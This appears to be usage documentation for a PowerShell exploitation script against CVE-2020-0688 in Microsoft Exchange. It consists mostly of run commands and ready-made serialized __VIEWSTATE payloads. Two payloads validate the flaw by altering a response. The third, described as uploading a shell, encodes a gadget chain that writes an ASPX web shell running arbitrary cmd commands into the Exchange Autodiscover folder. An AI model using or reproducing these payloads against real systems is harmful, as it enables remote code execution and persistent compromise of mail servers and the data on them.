Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml <XAML PATH> -uri <default|liveiderror|...>
This is an example of vulnerability validation by seting header in response.
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Header.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27
__VIEWSTATE=
/wEy4AkAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACCCDxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIA0KICAgIHhtbG5zOnM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiANCiAgICB4bWxuczp3PSJjbHItbmFtZXNwYWNlOlN5c3RlbS5XZWI7YXNzZW1ibHk9U3lzdGVtLldlYiI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9ImEiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgdzpIdHRwQ29udGV4dC5DdXJyZW50fSIgTWV0aG9kTmFtZT0iIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYiIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBhfSIgTWV0aG9kTmFtZT0iZ2V0X1Jlc3BvbnNlIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYyIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iZ2V0X0hlYWRlcnMiPjwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJkIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGN9IiBNZXRob2ROYW1lPSJBZGQiPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgIDxzOlN0cmluZz5URVNULUhFQURFUjwvczpTdHJpbmc+DQogICAgICA8czpTdHJpbmc+UmF2aW5BY2FkZW15PC9zOlN0cmluZz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iRW5kIj48L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgsmMAD8uTn0dD7/75sv25RCgZzaIQ==
This is an example of vulnerability validation by seting string in response.
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Response.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27
__VIEWSTATE=
/wEyxwgAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADpBjxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIA0KICAgIHhtbG5zOnM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiANCiAgICB4bWxuczp3PSJjbHItbmFtZXNwYWNlOlN5c3RlbS5XZWI7YXNzZW1ibHk9U3lzdGVtLldlYiI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9ImEiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgdzpIdHRwQ29udGV4dC5DdXJyZW50fSIgTWV0aG9kTmFtZT0iIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYiIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBhfSIgTWV0aG9kTmFtZT0iZ2V0X1Jlc3BvbnNlIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYyIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iV3JpdGUiPg0KICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgPHM6U3RyaW5nPlJBVklOQUNBRE1ZPC9zOlN0cmluZz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iRW5kIj48L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgtlS34OId/SqujzElQ7KDitWUhWwA==
This is an example for uploading shell by LiveIdError.aspx.
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Upload-Shell.xml -uri liveiderror __VIEWSTATEGENERATOR=
31563A0D
__VIEWSTATE=
/wEy5x4AAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACJHTxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgICB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCIgDQogICAgeG1sbnM6cz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogICAgeG1sbnM6dz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uV2ViO2Fzc2VtYmx5PVN5c3RlbS5XZWIiPg0KICA8czpTdHJpbmcgeDpLZXk9ImEiIHg6RmFjdG9yeU1ldGhvZD0iczpFbnZpcm9ubWVudC5HZXRFbnZpcm9ubWVudFZhcmlhYmxlIiB4OkFyZ3VtZW50cz0iRXhjaGFuZ2VJbnN0YWxsUGF0aCIvPg0KICA8czpTdHJpbmcgeDpLZXk9ImIiIHg6RmFjdG9yeU1ldGhvZD0iQ29uY2F0Ij4NCiAgICA8eDpBcmd1bWVudHM+DQogICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImEiLz4NCiAgICAgIDxzOlN0cmluZz5DbGllbnRBY2Nlc3NcXEF1dG9kaXNjb3ZlclxcUmF2aW4uYXNweDwvczpTdHJpbmc+DQogICAgPC94OkFyZ3VtZW50cz4NCiAgPC9zOlN0cmluZz4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0ieCIgT2JqZWN0VHlwZT0ie3g6VHlwZSBzOklPLkZpbGV9IiBNZXRob2ROYW1lPSJXcml0ZUFsbFRleHQiPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYiIvPg0KICAgICAgPHM6U3RyaW5nPiZsdDslQHBhZ2UgbGFuZ3VhZ2U9JnF1b3Q7QyMmcXVvdDslJmd0Ow0KDQombHQ7JUAgaW1wb3J0IE5hbWVzcGFjZT0mcXVvdDtTeXN0ZW0uSU8mcXVvdDslJmd0Ow0KDQombHQ7JUAgaW1wb3J0IE5hbWVzcGFjZT0mcXVvdDtTeXN0ZW0uWG1sJnF1b3Q7JSZndDsNCg0KJmx0OyVAIGltcG9ydCBOYW1lc3BhY2U9JnF1b3Q7U3lzdGVtLlhtbC5Yc2wmcXVvdDslJmd0Ow0KDQombHQ7JQ0Kc3RyaW5nIHhtbD1AJnF1b3Q7Jmx0Oz94bWwgdmVyc2lvbj0mcXVvdDsmcXVvdDsxLjAmcXVvdDsmcXVvdDs/Jmd0OyZsdDtyb290Jmd0O3Rlc3QmbHQ7L3Jvb3QmZ3Q7JnF1b3Q7Ow0Kc3RyaW5nIHhzbHQ9QCZxdW90OyZsdDs/eG1sIHZlcnNpb249JzEuMCc/Jmd0Ow0KJmx0O3hzbDpzdHlsZXNoZWV0IHZlcnNpb249JnF1b3Q7JnF1b3Q7MS4wJnF1b3Q7JnF1b3Q7IHhtbG5zOnhzbD0mcXVvdDsmcXVvdDtodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0mcXVvdDsmcXVvdDsgeG1sbnM6bXN4c2w9JnF1b3Q7JnF1b3Q7dXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4c2x0JnF1b3Q7JnF1b3Q7IHhtbG5zOnpjZz0mcXVvdDsmcXVvdDt6Y2dvbnZoJnF1b3Q7JnF1b3Q7Jmd0Ow0KICAgICZsdDttc3hzbDpzY3JpcHQgbGFuZ3VhZ2U9JnF1b3Q7JnF1b3Q7SlNjcmlwdCZxdW90OyZxdW90OyBpbXBsZW1lbnRzLXByZWZpeD0mcXVvdDsmcXVvdDt6Y2cmcXVvdDsmcXVvdDsmZ3Q7DQogICAgJmx0O21zeHNsOmFzc2VtYmx5IG5hbWU9JnF1b3Q7JnF1b3Q7bXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JnF1b3Q7JnF1b3Q7LyZndDsNCiAgICAmbHQ7bXN4c2w6YXNzZW1ibHkgbmFtZT0mcXVvdDsmcXVvdDtTeXN0ZW0uRGF0YSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkmcXVvdDsmcXVvdDsvJmd0Ow0KICAgICZsdDttc3hzbDphc3NlbWJseSBuYW1lPSZxdW90OyZxdW90O1N5c3RlbS5Db25maWd1cmF0aW9uLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYSZxdW90OyZxdW90Oy8mZ3Q7DQogICAgJmx0O21zeHNsOmFzc2VtYmx5IG5hbWU9JnF1b3Q7JnF1b3Q7U3lzdGVtLldlYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EmcXVvdDsmcXVvdDsvJmd0Ow0KICAgICAgICAmbHQ7IVtDREFUQVtmdW5jdGlvbiB4bWwoKXsNCiAgICAgICAgdmFyIGM9U3lzdGVtLldlYi5IdHRwQ29udGV4dC5DdXJyZW50O3ZhciBSZXF1ZXN0PWMuUmVxdWVzdDt2YXIgUmVzcG9uc2U9Yy5SZXNwb25zZTsNCiAgICAgICAgdmFyIGNvbW1hbmQgPSBSZXF1ZXN0Lkl0ZW1bJ2NtZCddOw0KICAgICAgICB2YXIgciA9IG5ldyBBY3RpdmVYT2JqZWN0KCZxdW90OyZxdW90O1dTY3JpcHQuU2hlbGwmcXVvdDsmcXVvdDspLkV4ZWMoJnF1b3Q7JnF1b3Q7Y21kIC9jICZxdW90OyZxdW90Oytjb21tYW5kKTsNCiAgICAgICAgdmFyIE91dFN0cmVhbSA9IHIuU3RkT3V0Ow0KICAgICAgICB2YXIgU3RyID0gJnF1b3Q7JnF1b3Q7JnF1b3Q7JnF1b3Q7Ow0KICAgICAgICB3aGlsZSAoIU91dFN0cmVhbS5hdEVuZE9mU3RyZWFtKSB7DQogICAgICAgICAgICBTdHIgPSBTdHIgKyBPdXRTdHJlYW0ucmVhZEFsbCgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICBSZXNwb25zZS5Xcml0ZSgmcXVvdDsmcXVvdDsmbHQ7cHJlJmd0OyZxdW90OyZxdW90OytTdHIrJnF1b3Q7JnF1b3Q7Jmx0Oy9wcmUmZ3Q7JnF1b3Q7JnF1b3Q7KTsNCiAgICAgICAgfV1dJmd0Ow0KICAgICZsdDsvbXN4c2w6c2NyaXB0Jmd0Ow0KJmx0O3hzbDp0ZW1wbGF0ZSBtYXRjaD0mcXVvdDsmcXVvdDsvcm9vdCZxdW90OyZxdW90OyZndDsNCiAgICAmbHQ7eHNsOnZhbHVlLW9mIHNlbGVjdD0mcXVvdDsmcXVvdDt6Y2c6eG1sKCkmcXVvdDsmcXVvdDsvJmd0Ow0KJmx0Oy94c2w6dGVtcGxhdGUmZ3Q7DQombHQ7L3hzbDpzdHlsZXNoZWV0Jmd0OyZxdW90OzsNClhtbERvY3VtZW50IHhtbGRvYz1uZXcgWG1sRG9jdW1lbnQoKTsNCnhtbGRvYy5Mb2FkWG1sKHhtbCk7DQpYbWxEb2N1bWVudCB4c2xkb2M9bmV3IFhtbERvY3VtZW50KCk7DQp4c2xkb2MuTG9hZFhtbCh4c2x0KTsNClhzbHRTZXR0aW5ncyB4c2x0X3NldHRpbmdzID0gbmV3IFhzbHRTZXR0aW5ncyhmYWxzZSwgdHJ1ZSk7DQp4c2x0X3NldHRpbmdzLkVuYWJsZVNjcmlwdCA9IHRydWU7DQp0cnl7DQogICAgWHNsQ29tcGlsZWRUcmFuc2Zvcm0geGN0PW5ldyBYc2xDb21waWxlZFRyYW5zZm9ybSgpOw0KICAgIHhjdC5Mb2FkKHhzbGRvYyx4c2x0X3NldHRpbmdzLG5ldyBYbWxVcmxSZXNvbHZlcigpKTsNCiAgICB4Y3QuVHJhbnNmb3JtKHhtbGRvYyxudWxsLG5ldyBNZW1vcnlTdHJlYW0oKSk7DQp9DQpjYXRjaCAoRXhjZXB0aW9uIGUpew0KICAgIFJlc3BvbnNlLldyaXRlKCZxdW90O0Vycm9yJnF1b3Q7KTsNCn0NCiUmZ3Q7DQo8L3M6U3RyaW5nPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJjIiBPYmplY3RJbnN0YW5jZT0ie3g6U3RhdGljIHc6SHR0cENvbnRleHQuQ3VycmVudH0iIE1ldGhvZE5hbWU9IiIvPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJkIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGN9IiBNZXRob2ROYW1lPSJnZXRfUmVzcG9uc2UiLz4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBkfSIgTWV0aG9kTmFtZT0iRW5kIi8+DQo8L1Jlc291cmNlRGljdGlvbmFyeT4LfsfNBBf2KLz18AunP/sNrNcKUMM=